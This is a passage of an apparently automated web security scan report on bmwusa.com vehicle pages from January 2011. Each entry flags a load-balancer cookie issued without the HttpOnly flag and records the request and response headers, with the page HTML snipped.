Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:35 GMT;path=/
Content-Length: 214337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.275. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:59 GMT;path=/
Content-Length: 214338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.276. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:53 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:53 GMT;path=/
Content-Length: 202023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.277. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:22 GMT;path=/
Content-Length: 214373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.278. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:58 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:58 GMT;path=/
Content-Length: 227791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.279. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:36 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:36 GMT;path=/
Content-Length: 215373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.280. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:26 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:26 GMT;path=/
Content-Length: 202293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.281. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:20 GMT;path=/
Content-Length: 202294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.282. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:01 GMT;path=/
Content-Length: 214718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.283. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.284. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.285. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:16 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:16 GMT;path=/
Content-Length: 214442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.286. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:04 GMT;path=/
Content-Length: 214443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.287. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
